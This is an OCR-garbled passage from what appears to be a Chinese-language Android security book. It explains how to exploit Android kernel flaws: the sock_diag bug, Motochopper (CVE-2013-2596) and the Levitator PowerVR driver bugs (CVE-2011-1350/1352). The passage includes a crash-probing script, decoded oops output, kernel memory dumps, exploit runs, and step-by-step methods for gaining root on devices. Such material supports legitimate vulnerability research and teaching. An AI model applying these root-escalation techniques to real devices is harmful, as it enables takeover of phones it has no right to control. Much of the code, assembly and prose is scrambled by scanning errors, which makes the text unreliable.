dev:~/android/sock_ diag $ cat getem.sh 

#!/bin/bash 

CMD="adb wait-for-device shell /data/local/tmp/sock_diag" 
/usr/bin/time -o timing -f %e SCMD $1 
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TIMES*Cat timing | Cut sa EL 
let TIME=$(( STIME + 0 )) 
if [ STIME -gt 1 ]; then 


adb wait-for-device pull /proc/last_kmsg kmsg.s1 


£i 


dev:~/android/sock diag $ for ii in 


[| 
The shell script detects 


shell 脚本 会 根据 aqb shel1l 命令 
会 重启 ， 期 间 ADB 会 


dev:~/android/sock_ diag $ grep 
| ‘Gut, =£f 20=- 

[2 
kmsg.48: 
[| 
Kmsg, ST: 
[sei] 
kmsg. 
kmsg. 
kmsg. 
kmsg. 
kmsg. 
kmsg. 


[. 


handle 
handle 
handle 
handle 
handle 
handle 


: Unable 
Unable 
Unable 
Unable 
Unable 
Unable 


to 
to 
to 
to 
to 
to 








PPRP PP 
OU 心 wo 


执行 时 间 长 短 来 判断 设备 是 否 朋 演 。 如 果 发 生 骨 省 ， 
会 话 暂 时 断 开 。 如 果 没 有 发 生 骨 省 ，ADB 会 
会 将 /proc/1last_kmsg 保存 到 带 有 数组 下 标的 文件 名 当中 。 命 令 执 


'Unable to handle kernel paging request' 





kernel 
kernel 
kernel 
kernel 
kernel 
kernel 


“seq 1 128’; do ./getem.sh $ii; done 

















设备 
迅速 返回 。 检 测 到 崩 演 时 ， 脚 本 
了 J 了 后， 结果 如 下 : 


kmsg.* AN 








Unable to handle kernel paging request at virtual address 00001004 


Unable to handle kernel paging request at virtual address 00007604 


31000034 
00320004 
00003304 
35000038 
00360004 
00003704 


address 
address 
address 
address 
address 
address 


virtual 
virtual 


at 
at 
at 
a 
at 
at 


request 
request 
request 
request 
request 
request 


paging 
paging 
paging 
paging 
paging 
paging 


virtual 
virtual 
virtual 
virtual 





可 以 看 到 ， 一 些 下 标 值 能 


开启 了 mmap_min_adgdgr 保护 机 制 ， 不 外 


可 用 的 ， Se 
些 地 址 是 否 稳定 

















让 内 核 在 尝试 读 取 用 户 空 
BE 利用 用 户 空间 开头 的 一 些 地 址 ; 但 是 后 面 的 一 
文 些 地 址 ， 从 而 控制 nng1 的 内 容 。 问 题 是 ， 应 该 使 用 什么 地 址 ?这 


间 数 据 时 发 生前 溃 。 不 幸 的 是 ,由 于 内 核 
些 地 址 是 








10.4.2 人 last_kmsg 中 的 Oops 消息 , 并 指出 使 用 decodecode 脚本 特别 有 用 。 下 面 的 





输出 展示 了 这 个 脚本 如 何 从 前 溃 信 息 





中 获得 有 用 的 细节 信息 。 


dev:~/android/src/kernel/msm $ export CROSS_ COMPILE=arm-eabi- 


dev:~/android/src/kernel/msm $ 


./scripts/decodecode < oops.txt 


[ 174.378177] Code: e5963008 e3530000 03e04001 0a000004 (e5933004) 
All code 
0 e5963008 Ta r3, [r6, #8] 
4: e3530000 cmp r3, #0 
8 : 03e04001 mvneq r4, #1 
en 0a000004 bed 0X24 
上 Os e5933004 lgdr 下 人 3 和 4 <-- trapping instruction 


0: e5933004 


decodecode 脚本 画 出 一 


个 箭头 ， 指 出 了 有 骨 溃 发 生 点 和 引起 前 溃 的 指令 。 


追踪 代码 和 前 面 的 
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数据 流 , 可 以 发 现 *3 从 r3 加 4 指向 的 地 址 中 取 值 。 虽 然 不 知道 r3 这 时 候 的 值 是 什么 , 但 稍微 
往 前 看 就 会 发 现 r4 的 值 来 自 于 r6 指向 的 内 存 。 在 存在 漏洞 的 设备 中 查看 /proc/kallsysms ， 会 发 
现下 面 的 符号 在 *6 值 的 范围 内 。 

c108b988 b sock_diag handlers 

c108bb44 b nf_log_sysctl1_fnames 

c108bb6c b nf_log_sysctl_ table 

此 处 r6 指向 nf_log_sysct1_fnames 的 数据 区 。 在 内 核 源 代码 中 搜索 这 个 符号 ， 会 找到 
下 面 的 代码 : 


274 for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++) { 
275 snprintf (nf_log_sysctl]_ fnames [i-NFPROTO_UNSPEC], 3, "%d", 1i); 


数组 通过 整数 转换 成 ASCI 字 符 串 的 方式 初始 化 。 每 个 字符 串 都 是 3 字 节 。 从 Oops 消息 中 
dump r6 附近 的 内 存 ， 就 能 确认 这 些 数据 。 


























r3 : 00360000 r2 :ecfy7adcc8 r1 : ea9dq6600 r0 : codqe8clc 


R6: 0xc108bacc : 

bacc c0Odcf2d4 c0Odcf2d4 c0dq9aef8 c0dq9aef8 cil08badc cil08badc c108bae4 c108bae4 
baec cl08baec c108baec c108baf4 c108baf4 c108bafc c108bafc c108bb04 c108bb04 
bboc cli08bb0c ci08bb0c c108pb14 c108bb14 ci08bblc c108bpblc c108bp24 c108bp24 
bb2c  c108bp2c c108bb2c c108pb34 c108pb34 00000000 e2fp7500 31000030 00320000 
bb4c 00003300 35000034 00360000 00003700 39000038 30310000 00313100 00003231 
bb6c cli08bb44 00000000 00000040 000001a4 00000000 c0682be8 00000000 00000000 
bb8c 00000000 ci08bb47 00000000 00000040 000001a4 00000000 c0682pe8 00000000 
bbac 00000001 00000000 ci08bb4a 00000000 00000040 000001a4 00000000 c0682be8 

















ASCI 字符 串 起 始 于 地 址 0xc108bb44。 似 乎 存在 一 种 模式 : 每 个 字符 串 都 是 3 字 节 ,字符 串 
对 应 数字 的 ASCII 码 , 并 且 数 字 逐 渐 增 长 。 这 些 字 符 串 在 启动 过 程 中 是 静态 初始 化 的 , 所 以 这 是 
一 个 相当 稳定 的 用 户 空间 地 址 ， 适 于 进行 漏洞 利用 。 

为 了 成 功利 用 这 个 漏洞 ,需要 在 这 个 地 址 映射 一 些 内 存 以 便 内 核 通 过 对 应 的 索引 访问 。 例 如 ， 
如 果 使 用 115 作为 下 标 ， 就 要 在 地 址 0x360000 处 映射 一 些 可 读 可 写 可 执行 (RWX ) 的 内 存 ， 然 
后 在 内 存 偏 移 0x04 的 位 置 设置 一 个 指向 载荷 的 指针 。 该 指针 被 调用 时 ， 内 核 空 间 载 入 就 会 执行 
并 给 出 root 权限 ， 最 后 正常 返回 。 如 果 一 切 顺利 ， 就 能 成 功利 用 这 个 漏洞 获得 root 权限 。 

2. Motochopper 

2013 年 4 月 ,多 产 的 Android 漏洞 利用 开发 者 Dan Rosenberg 开发 并 发 布 了 名 为 Motochopper 
的 利用 。 尽管 其 目的 是 root 几 款 摩托 罗拉 设备 ,不 过 许多 其 他 品牌 的 设备 也 受到 了 影响 , 包括 三 
星 Galaxy S3。 最 初 的 利用 为 了 隐藏 内 部 原理 ， 较 好 地 进行 了 混淆 。 它 实现 了 一 个 自 定义 的 虚拟 
机 ,打开 了 很 多 无 用 的 文件 , 还 用 了 一 个 巧妙 的 方法 来 隐藏 执行 的 系统 调用 。 这 个 利用 背后 的 漏 
洞 后 来 被 赋予 编号 CVE-2013-2596， 相 应 描述 如 下 : 
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Linux 内 核 3.8.9 之 前 的 版 本 中 ,用 于 某 摩 托 罗 拉 Android 4.1.2 等 设备 中 drivers/video/ 
fbmem.c 的 fb_mmap 函数 存在 整数 溢出 。 这 个 漏洞 使 本 地 用 户 可 以 为 整个 内 核 内 存 创 
建 可 读 可 写 的 内 存 映射 ， 并 最 终 通 过 构造 /dev/graphics/fb0 的 mmap2 系统 调用 来 获得 特 
权 ， 正 如 Motochopper pwn 程序 所 展示 的 。 





为 了 进一步 观察 , 查阅 Linux 内 核 中 drivers/video/fomem.c 文件 的 fb_mmap 国 数 。 说 得 更 具 


体 一 些 ， 选 择 Sprint 三 星 Galaxy S3 ( 固件 版 本 L710VPBMD4 ) 中 的 代码 : 


控 





1343 static int 

1344 fb mmap(struct file *file, struct vm area_ struct * vma) 

1345 { 

1356 off = vma->vm pgoff << PAGE_SHIFT; 

1369 start = info->fix.smem start; 

1370 len = PAGE ALIGN((start & ~PAGE MASK) + info->fix.smem len); 
1383 if ((vma->vm end - vma->vm start + off) > len) 

1384 return -EINVAL; 

1391 if (io_remap_pfn range(vma, vma->vm start, off >> PAGE_SHIFT, 
1392 vma->vm_end - vma->vm_ start, vma->vm_ page_prot)) 


vma 参数 来 自 于 调用 fb_mmap ( mmap_region 中 ) 之 前 的 mmap 系统 调用 ， 因 此 可 以 完全 

















出 这 个 结构 的 所 有 成 员 。off 变量 是 直接 传人 mmap 的 相对 于 基 址 的 偏 移 ， 但 是 第 1369 行 赋 

















值 的 start 是 frame buffer 自身 的 属性 ,在 第 1370 行 ,len 是 start 的 页 对 齐 地 址 和 frame buffer 
区 域 长 度 之 和 。 在 第 1383 行 ， 可 以 看 到 这 个 漏洞 产生 的 原因 。 代 码 将 你 控制 的 vm_end 和 








vm_start 相 减 ， 来 计算 所 请 求 映 射 的 长 度 ， 然后 把 得 到 的 结 细 














加 上 off ， 判 断 是 否 超过 1en。 


如 果 指 定 off 为 一 个 很 大 的 值 ， 求 和 的 结果 会 溢出 并 通过 检查 。 最 终 ， 一 大 片 内 核 内 存 区 域 会 





被 重新 映射 到 用 户 的 虚拟 内 存 空间 。 


Dan 利用 该 漏洞 的 方法 分 为 两 步 。 第 一 步 ， 通 过 尝试 分 配 越 来 越 大 的 内 存 来 检测 len 的 值 。 





他 将 offset 设 为 0, 然后 以 每 次 一 页 的 速度 增加 size。 一 旦 要 映射 的 内 存 大 小 超过 len, fm_mmap 
函数 就 会 在 第 1384 行 返回 错误 。 检 测 到 这 个 错误 后 ，Dan 记录 下 这 个 值 并 在 下 一 步 使 用 。 第 二 
步 ,在 触发 整数 溢出 的 同时 ,尝试 尽 可 能 分 配 最 大 的 内 存 。 他 从 一 个 比较 保守 的 最 大 值 开 始 ， 然 


后 逐渐 减 小 。 在 每 次 尝试 之 前 ， 使 用 之 前 检测 到 的 len 来 计算 出 可 以 触发 整数 溢出 的 off 值 。 
mmap 调用 成 功 后 ， 当 前 进程 就 拥有 了 内 核 大 片 内 存 区 域 的 读 写 权 限 。 








有 很 多 方法 可 以 利用 内 核 内 存 的 任意 读 写 来 提 权 。 一 种 是 直接 重 写 内 核 代 码 。 例 如 ,可 以 修 











改 setuid 系统 调用 , 永远 允许 将 user ID 设置 为 root。 另 一 种 是 通过 修改 内 核 内 存 中 的 各 种 bit， 











在 内 核 空间 直接 执行 任意 代码 。 这 种 方法 在 前 面 利用 sock_aiag 漏洞 时 采用 过 。 还 有 一 种 方法 








是 Dan 在 Motochopper 中 采用 的 : 找到 当前 用 户 的 credentials 结构 体 并 直接 修改 。 这 将 当前 进程 


的 用 户 和 组 人 D 设置 为 0， 从 而 获得 root 权限 。 读 写 内 核 内 存 是 非常 强大 的 能 力 。 关 于 其 他 利用 
方法 ， 则 交 给 读者 进行 思考 。 
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3. Levitator 

2011 年 11 月 ，Jon Oberheide 和 Jon Larimer 发 布 了 一 个 名 为 levitator.c 的 利用 程序 。 在 
当时 ， 这 是 一 个 高 级 利用 ， 因 为 它 用 到 了 两 个 相关 的 内 核 漏洞 : 一 个 信息 泄露 和 一 个 内 存 破坏 。 
Levitator 针对 于 使 用 PowerVR SGX 3D 图 形 芯 片 的 Android 设备 ,例如 Nexus S 和 Motorola Droid。 
本 市 展示 把 Levitator 移植 在 Motorola Droid 上 运行 的 整个 过 程 ， 解 释 了 在 分 析 和 利用 Linux 内 核 
漏洞 当中 用 到 的 一 些 其 他 技术 。 

利用 程序 的 原理 

因为 利用 程序 的 源 代码 已 经 发 布 , 所 以 可 以 在 网 上 获取 一 份 进行 阅读 。 文件 的 开头 是 一 大 块 
注释 ， 包含 作者 名 称 、 两 个 CVE 编号 和 描述 、 编 译 命令 、 样 例 输出 、 测 试 设备 以 及 修补 信息 。 
接 下 来 是 一 些 常量 和 一 个 结构 体 ， 用 来 与 PowerVR 通讯 。 然 后 是 fake_disk_ro_show 因数 ， 实 
现 了 一 个 典型 的 内 核 空间 载荷 。 之 后 的 代码 定义 了 两 个 数据 结构 和 全 局 变量 fake_dev_attr_ro。 


























注意 在 编译 和 运行 利用 程序 之 前 阅读 和 理解 源 代码 非常 重要 ， 否 则 很 可 能 会 对 系统 造成 不 可 
修复 的 伤害 。 


利用 程序 代码 其 余 的 部 分 包含 3 个 函数 : get_symbol、do_ioctl 和 main。get_symbol 
函数 在 /proc/kallsyms 搜索 符号 名 并 返回 对 应 地 址 或 0。go_ioct1 函数 是 利用 程序 的 “心脏 ”， 
用 于 设置 参数 并 执行 存在 漏洞 的 IO 控制 操作 ( ioct1 )。 

main 函数 则 是 利用 程序 的 “大 脑 ”, 实现 了 漏洞 利用 的 逻辑 。 它 首先 搜索 3 个 符号 : commit_ 
creds、prepare_ kernel cred 和 dev_attr_ro。 前 两 个 由 内 核 空间 的 载荷 函数 使 用 ， 第 三 个 
随后 讨论 。 接 下 来 ， 利用 程序 打开 驱动 存在 漏洞 的 设备 并 首次 执行 ao_ioctl 函数 ,传人 out 和 
out_size 参数 来 把 内 核 内 存 泄露 到 aump 缓冲 区 中 。 然后 在 缓冲 区 中 搜索 指向 dev_attr_ro 对 
象 的 指针 , 并 全 部 改 成 指向 fake_dev_attr_ro 的 指针 , 其 中 包含 指向 内 核 空间 载荷 的 指针 。 接 
下 来 再 次 调用 ao_ioct1， 指 定 in 和 in_size 参数 并 把 修改 过 的 dump 缓冲 区 写 回 内 核 内 存 。 
扫描 /sys/block 目录 中 的 条 目 , 尝试 打开 和 读 取 ro 条 目 。 如 果 ro 条 目 与 修改 后 的 对 象 相 匹配 ,内 
核 就 会 执行 fake_aqisk_ro_show， 读 到 的 数据 是 Owned。 本 例 中 ， 利 用 程序 检测 到 利用 成 功 ， 
然后 停止 处 理 /sys/block 中 的 条 目 。 最 后 ,利用 程序 恢复 之 前 修改 的 指针 ,为 用 户 打开 一 个 root shell。 

运行 已 有 的 利用 程序 

阅读 利用 程序 源 代码 之 后 可 以 知道 , 在 目标 设备 上 编译 和 运行 它 很 安全 。 执行 命令 后 结果 如 下 : 

$ ./levitator 
+] looking for symbols... 
+] resolved symbol commit_creds to 0xc0078ef0 
+] 


resolved symbol prepare_ kernel_cred to 0xc0078d64 
-] dev_attr_ro symbol not found, aborting! 


利用 程序 没有 找到 dev_attr_ro 符号 , 但 是 这 个 错误 并 不 代表 设备 不 存在 这 个 漏洞 。 编 辑 
利用 程序 ， 注 释 掉 最 后 一 次 调用 get_symbol (第 181~ 187 行 )。 给 dev_attr_ro 赋 一 个 不 太 
可 能 在 内 核 内 存 中 存在 的 值 ， 如 0xdeadbeef。 修 改 后 重新 编译 、 上 传 、 运 行 ， 输 出 如 下 : 
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$ ./nodevattr 

looking for symbols... 

resolved Symbol commit_creds to 0xc0078ef0 

resolved symbol prepare_ kernel_ cred to Oxc0078d64 
opening prvsrvkm device... 

dumping kernel memory... 

searching kmem for dev_attr_ro pointers... 

poisoned 0 dev_attr_ ro pointers with fake dev_attr_ ro! 
could not find any dev_attr_ ro ptrs, aborting! 


理解 了 利用 程序 的 原理 ， 就 可 以 知道 ioct1l 操作 成 功 了 。 这 表明 信息 泄露 正在 按照 预期 工 
作 ， 并 且 可 以 确定 该 设备 存在 漏洞 。 

然而 , 并 没有 修复 这 个 错误 的 简单 方法 。 利 用 程序 非常 依赖 于 找到 aev_attr_ro 内 核 符号 ， 
而 这 在 设备 的 /proc/kallsyms 上 是 不 可 能 的 。 需要 耐心 、 创 造 力 以 及 对 漏洞 的 深入 理解 ,才能 让 这 
个 利用 程序 在 设备 上 正常 工作 。 

获得 源 代码 

遗憾 的 是 ， 关 于 这 两 个 漏洞 能 找到 的 所 有 公开 信息 只 有 这 个 利用 程序 和 2 个 CVE。 为 了 深 
入 理解 漏洞 ， 需 要 获得 目标 设备 的 内 核 源 代码 。 首 先 在 设备 上 查询 版 本 信息 : 


$ getprop ro.build.fingerprint 
verizon/voles/sholes/sholes:2.2.3/FRK76/185902:user/release-keys 

S cat /proc/version 

Linux version 2.6.32.9-g68eeef5 (android-build@apa26.mtv.corp.google.com) (gcc 
version 4.4.0 (GCC) ) #1 PREEMPT Tue Aug 10 16:07:07 PDT 2010 


从 这 个 设备 的 编译 指纹 信息 来 看 ， 它 运行 的 是 最 新 的 固件 版 本 FRK76。 好 消息 是 ， 这 个 版 
本 的 内 核 是 谷歌 自己 编译 的 ， 而 且 版 本 号 字符 串 包含 了 一 个 commit 哈 希 68eeef5; 坏 消息 是 ， 
歌 维护 的 OMAP 内 核 源 代码 已 经 不 包含 带 有 这 个 commit 的 分 支 了 。 

使 用 搜索 引擎 来 寻找 这 个 commit 哈 希 可 以 找到 一 些 结果 , 其 中 几 个 包含 这 个 commit 的 完整 
哈 希 。 经 过 仔细 寻找 ， 会 在 Gitorious 上 发 现 相 关 代 码 : https://gitorious.org/android_kernel_omap/ 
android kernel omap/。 复 制 这 个 仓库 并 check out 哈 希 对 应 的 commit， 就 可 以 进一步 分 析 这 个 漏 
洞 了 。 

判断 原因 

获得 正确 的 源 代码 后 ， 使 用 git grep 命令 可 以 找到 存在 漏洞 的 代码 。 搜 索 设 备 名 称 /dev/ 
pvrsrvkm 可 以 找到 一 个 文件 操作 结构 ， 进 而 找到 句柄 函数 PVRSRV_BridgeDispatchKM。 仔 细 
阅读 后 可 以 发 现 ， 漏 洞 并 不 直接 在 这 个 函数 中 ， 而 是 在 它 调 用 的 BridgeDispatchKM 函数 中 。 

通过 git grep 的 方法 ,在 drivers/gpupvrbridged pvr_ bridge.c 的 第 3282 行 可 以 找到 
BridgeDispatchKM 国 数 。 这 个 函数 非常 短 ， 开 头 部 分 不 太 关 键 ， 但 是 后 面 儿 块 代码 看 起 来 很 
可 疑 。 相 关 代码 如 下 所 示 : 


3282 IMG_INT BridgedDispatchKM(PVRSRV_PER_PROCESS_DATA * psPerproc, 
3283 PVRSRV_BRIDGE_PACKAGE * psBridgePackageKM) 
3284 { 


1 + 二 十 十 十 十 十 
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33.5L psBridgeIn = 
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( (ENV_DATA *)psSysData->pvEnvSpecificData)->pvBridgeData; 
3392 psBridgeOut = (IMG_ PVOID) ((IMG_PBYTE)psBridgeIn + 
PVRSRV_MAX_BRIDGE_IN_SIZE) ; 





3353 

3354 if (psBridgePackageKM->ui32InBufferSize > 0) 

3355 { 

3363 if (CopyFromUserWrapper (psPerpProc, 

3364 ui32BridgeID, 

3365 psBridgeIn, 

3366 psBridgePackageKM->pvParamIn, 

3367 psBridgePackageKM->ui32InBufferSize) 


psBridgePackageKM 参数 对 应 的 结构 是 从 用 户 空间 复制 而 来 的 。 在 第 3351 和 3352 行 , 作 
者 将 psBrigdgeIn 和 psBridgeOout 指向 psysData->pvEnvSpecificationData 的 
pvBridgeData 成 员 。 如 果 ui32InBufferSize 大 于 0，CopyFromUserWrapper 国 数 就 会 被 
调用 。 这 个 函数 仅仅 是 Linux 内 核 中 标准 copy_from_user 函数 的 一 个 封装 。 事 实 上 ， 前 两 个 
参数 会 被 忽略 ， 实 际 调用 的 函数 是 : 


if(copy_from user (psBridgeIn, psBridgePackageKM->pvParamIn, 
psBridgePackageKM->ui32InBufferSize)) 


此 时 ，ui32InBuffersize 可 以 被 完全 控制 ， 并 没有 与 psBridgeIn 指向 的 内 存 大 小 进行 
比较 验证 。 如 果 指 定 一 个 比 buffer 更 长 的 大 小 ， 就 可 以 越过 边界 写 入 内 存 , 破坏 内 核 内 存 。 这 个 
漏洞 被 赋予 编号 CVE-2011-1352。 

接 下 来 ， 驱 动 根据 bridge ID 从 一 个 分 发 表 中 读 取 一 个 函数 指针 并 执行 。 利 用 程序 使 用 的 
bridge ID 是 CONNECT_SERVICES， 对 应 驱动 中 的 PVRSRV_BRIDGE_CONNECT_SERVICES。 这 个 
bridge ID 对 应 的 函数 在 CommonBriqdgeInit 图 数 中 注册 ， 以 调用 PVRSRVConnectBW 图 数 。 然 
而 ， 这 个 函数 并 不 做 任何 相关 的 事情 。 返 回 到 BridgeDispatchKkM 函数 ， 接 下 来 的 代码 如 下 : 

















9 if (CopyToUserWrapper (psPerpProc, 

3400 ui32BridgeID, 

二 站 外 于 psBridgePackageKM->pvParamOut, 

3402 psBridgeOut, 

3403 psBridgePackageKM->ui320utBufferSize) 


可 以 看 到 另 一 个 函数 的 封装 copyToUserwrapper。 跟 之 前 一 样 ， 前 两 个 参数 被 忽略 ， 隐 数 
调用 为 : 
if(copy_to_user(psBridgePackageKM->pvParamOut, psBridgeOut, 
psBridgePackageKM->ui320utBufferSize)) 


这 一 次 ， 驱 动 把 数据 从 psBriqgeout 复制 到 传人 的 用 户 空间 的 内 存 中 。 同 样 信任 你 传人 
ui320utBuffersize 的 大 小 ， 即 所 复制 字 节 的 长 度 。 可 以 给 一 个 大 于 psBridgeout 指向 内 存 
的 长 度 ， 所 以 可 以 读 取 buffer 以 外 的 数据 。 这 个 问题 被 赋予 编号 CVE-2011-1350。 

基于 对 这 两 个 问题 的 深入 理解 , 利用 程序 所 做 的 事情 就 一 目 了 然 了 。 但 是 还 有 一 个 细节 不 清 
楚 ， 就 是 pvBridgeIn 和 pvBridqgeout 指向 的 是 哪里 ?为 了 明确 这 个 问题 ， 搜 索 基 指针 
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pvBridgeData。git grep 命令 似乎 没有 给 出 一 个 直接 赋值 的 地 方 ， 但 是 你 可 以 发 现 ， 
pvBridgeData 的 引用 被 drviers/gpu/pvr/osfunc.c 传人。 仔细 查看 如 下 代码 : 


426 PVRSRV_ERROR OSInitEnvData (IMG_PVOID *ppvEnvSpecificData) 














427 { 

437 if (OSAllocMem (PVRSRV_OS_PAGEABLE_HEAP, PVRSRV_MAX_ BRIDGE_IN_SIZE + 
PVRSRV_MAX_BRIDGE_OUT_SIZE, 

438 &psEnvData->pvBridgeData, IMG_NULL, 

439 "Bridge Data") != PVRSRV_OK) 

















重点 关注 0SAl11ocMem, 如 果 第 4 个 参数 是 0, 或 者 请 求 的 大 小 不 大 于 一 个 页 ( 0x1000 字 节 )， 
那么 它 就 会 使 用 kmalloc 分 配 内 存 ; 否则 使 用 内 核 的 vmalloc API 来 分 配 内 存 。 在 这 次 调用 中 ， 
请 求 大 小 为 IN_sIZE 和 oUT_sIZE 之 和 ， 两 个 都 是 0x1000。 这 解释 了 利用 程序 中 为 什么 要 加 减 
0x1000。 相 加 之 后 , 请求 大 小 就 是 两 个 页 ( 0x2000 ), 因此 会 使 用 vmalloc。 然 而 ,osSInitEnvData 
函数 在 调用 osallocMem 时 传人 了 0 作为 第 4 个 参数 .这样 ,两 个 页 大 小 的 内 存 就 能 通过 kmalloc 
来 分 配 了 。 

在 驱动 初始 化 过 程 中 ， 很 早 就 调用 了 osinitEnvData 函数 ( 启动 过 程 中 )。 这 意味 着 ， 对 
于 任意 一 次 启动 ，buffer 的 位 置 都 是 固定 的 。 与 内 核 堆 块 相 邻 的 内 存 究竟 是 什么 对 象 ， 则 取决 于 
启动 时 间 、 设 备 加 载 的 驱动 等 很 多 因素 。 这 是 一 个 重要 的 细节 ， 会 在 下 一 节 中 讨论 。 

修复 利用 程序 

理解 了 这 两 个 漏洞 ， 就 可 以 继续 努力 将 利用 程序 移植 到 目标 设备 上 了 。 

回忆 之 前 尝试 运行 原始 利用 程序 的 时 候 ，dev_attr_ro 符号 不 在 目标 设备 的 /proc/kallsyms 
当中 。 要 么 这 个 对 象 不 存在 ,要 么 这 个 符号 没有 被 导出 。 所 以 需要 寻找 另 一 个 对 象 的 符号 ,来 满 
足 两 个 条 件 。 首先 , 要 能 够 通过 修改 它 来 支持 内 核 的 控制 流 ， 就 像 原 先 的 利用 程序 那样 随时 控制 
支持 的 发 生 ， 但 这 并 不 是 必需 的 条 件 。 其 次 ， 这 个 对 象 必须 与 pvBridgeData buffer 相 邻 。 

为 了 解决 这 个 问题 ， 应 首先 满足 第 二 个 条 件 ， 然 后 再 满足 第 一 个 。 寻 找 与 pvBridgeData 
buffer 相 邻 的 内 存 非常 简单 , 要 对 之 前 改过 的 利用 程序 进行 进一步 修改 : 在 注释 掉 dev_attr_ro 
符号 解析 代码 的 基础 上 , 把 泄露 的 内 核 空 间 内 存 保存 到 一 个 文件 中 。 成功 后 重启 设备 , 继续 dump 
相 邻 的 内 存 。 为 了 得 到 多 次 boot 都 稳定 的 结果 ， 将 这 个 过 程 重复 100 次 。 拥 有 数据 文件 之 后 ， 
把 设备 中 的 /proc/kallsyms 提取 出 来 。 用 一 个 Ruby 小 脚本 ， 根 据 地 址 来 对 符号 名 进行 分 类 。 接 下 
来 处 理 这 100 个 样本 。 对 于 每 一 个 样本 ， 把 数据 拆 分 成 32 比特 大 小 ， 逐 一 查看 这 些 值 是 否 在 
/proc/kallsyms 的 分 类 当中 。 如 果 是 ， 相 应 符号 的 计数 加 一 。 

这 个 步骤 的 输出 是 /proc/kallsyms 中 的 一 个 对 象 类 型 列表 ,以 及 出 现在 buffer 旁边 的 频率 ( 总 
计 100 次 ) 前 10 项 如 下 所 示 : 


dev:~/levitator-droidl $ head dumps-on-fresh-boot.freq 
90 0xc003099c 七 kernel_thread_ exit 
86 0xc0069214 T do_no_restart_syscall 
78 0xc03cab18 t fair_sched class 
68 0xc01pc42c t klist_chilgdren get 
长 
人 

























































































































































































68 0xc01lbc368 klist_children_put 
65 0xc03cdee0 proc_dir_ inode operations 
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65 Oxc03cde78 七 proc_dqir_operations 

62 0xc00734a4 T autoremove_wake_function 
60 0xc006f968 t worker_thread 

58 0xc03ce008 t proc_file_inodqe_operations 


前 面 几 个 看 起 来 非常 好 , 因为 与 buffer 相 邻 的 比率 达到 了 90% 左 右 ; 但 是 简单 尝试 之 后 发 现 ， 
这 些 对 象 并 不 好 利用 。 在 剩 下 的 符号 中 ， 以 proc_ 开 头 的 对 象 需要 特别 注意 ， 它 们 控制 了 proc 
文件 系统 的 行为 。 这 很 有 用 ， 因 为 可 以 通过 与 /proc 下 的 条 目 交 互 来 触发 这 些 操作 。 这 上 比较 理想 
地 满足 了 第 一 个 条 件 ， 并 且 以 65% 的 比率 达到 了 第 二 个 条 件 。 

找到 proc_gdir_inode_operations 对 象 后 ,准备 开始 实现 这 个 新 方法 。 这 些 对 象 指针 与 
buffer 相 邻 ， 表 明 它 们 舱 入 在 一 些 其 他 类 型 的 对 象 中 。 回 头 看 一 下 内 核 源 代码 ， 找 到 赋值 语句 ， 
即 被 引用 的 对 象 在 右边 的 语句 。 这 样 可 以 找到 fs/proc/generic.c 中 的 第 572 行 代码 : 


559 static int proc_register(struct proc_ dir entry * dir, 
struet PDroc dirsentry * dp) 








S60 

569 if (S_ISDIR(dp->mode)) { 

570 if (dp->proc_iops == NULL) { 

S534 dp->proc_fops = &proc_ dir operations; 

572 dp->proc_iops = &proc_dir_ inode_ operations; 


内 核 使 用 proc_register 限 数 来 创建 proc 文件 系统 中 的 条 目 。 创 建 目 录 条 目 时 ， 它 会 把 
指向 proc_qdir_inode_operations 的 指针 赋值 给 proc_iops 成 员 。 基 于 ap 变量 的 类 型 ,可 
以 知道 这 个 相 邻 的 对 象 是 proc_dir_entry 结构 。 

知道 了 外 部 数据 类 型 的 结构 , 就 可 以 修改 它 的 元 素 了 。 把 需要 的 数据 结构 复制 到 新 的 利用 程 
序 文件 中 ,把 未 定义 的 指针 类 型 改 成 空 指 针 , 让 利用 程序 去 寻找 proc_dir_inode_operations 
符号 ( 而 不 是 dev_attr_ro )。 然 后 实现 新 的 触发 代码 ， 递 归 式 扫描 “/proc 中 的 所 有 条 目 。 最 后 
创建 一 个 特别 构造 的 inode_operations 表 , 让 getattr 成 员 指 向 你 的 内 核 空 间 载荷 。 当 系 
统 尝试 从 修改 后 的 proc_air_entry 中 获取 属性 时 , 内 核 会 调用 getattr 方法 , 这 样 就 得 到 了 
root 权限 。 跟 之 前 一 样 ， 做 一 些 清理 工作 并 打开 一 个 root shell。 成 功 了 ! 















































10.6 ”小结 


本 章 介绍 了 关于 攻击 Android 设备 Linux 内 核 的 一 些 主题 。 由 于 采用 单 内 核 设 计 和 分 发 配置 
方式 ， 并 且 暴 露 了 较 大 的 攻击 面 ， 所 以 Android 内 核 漏洞 利用 相对 简单 。 

除 此 之 外 , 本章 还 给 Android 内 核 利 用 程序 开发 者 提供 了 一 些 工具 和 建议 ， 让 利用 开发 变 得 
更 加 简单 。 本 章 涵盖 编译 自 定 义 内 核 和 模块 的 整个 过 程 ,， 展示 了 如 何 使 用 内 核 提供 的 各 种 调试 工 
具 ， 以 及 如 何 从 设备 和 原矿 固件 镜像 中 提取 信息 。 

本 章 的 几 个 案例 教 你 如 何 针对 内 核 内 存 破 坏 漏洞 进行 利用 程序 开发 。 这 些 漏 洞 包括 数组 越 
界 、 直 接 内 存 映射 、 信 息 泄 露 和 堆 破 坏 等 。 

下 一 章 将 讨论 Android 的 电话 子 系统 ,阐述 如 何 研 究 、 监 视 和 名 zz 无 线 接口 层 ( RIL ) 组 件 。 
























































攻击 RIL 无 线 接口 层 























无 线 接口 层 (Radio Interface Layer ) 简称 RIL， 是 Android 平 台中 负责 移动 通信 的 核心 组 件 。 
它 为 蜂窝 调制 解 调 器 (cellular modem ) 提供 接口 ， 借 助 移动 网 络 向 用 户 提 供 移动 通信 服务 。 从 
设计 上 来 说 ，RIL 独立 于 蜂窝 调制 解 调 器 芯片 ， 负 责 实现 语音 通话 、 短 信和 移动 上 网 等 功能 。 如 
果 没 有 RIL，Android 设备 就 不 能 接 人 移动 通信 网 络 。 因 此 在 某 种 程度 上 , RIL 是 Android 设备 作 
为 智能 手机 所 必 不 可 少 的 组 成 部 分 。 当 前 ， 并非 只 有 普通 手机 和 智能 手机 才 有 移动 通信 功能 ， 许 
多 平板 电脑 和 电子 书 阅读 器 也 内 建 了 实时 在 线 的 移动 上 网 功能 。 因 为 移动 上 网 是 由 RIL 负责 的 ， 
因此 RIL 存在 于 绝 大 部 分 Android 设备 中 。 

本 章 介 绍 RIL 的 工作 原理 ， 以 及 分 析 和 攻击 RIL 的 方法 。 原 理 部 分 介绍 组 成 RIL 的 各 个 模 
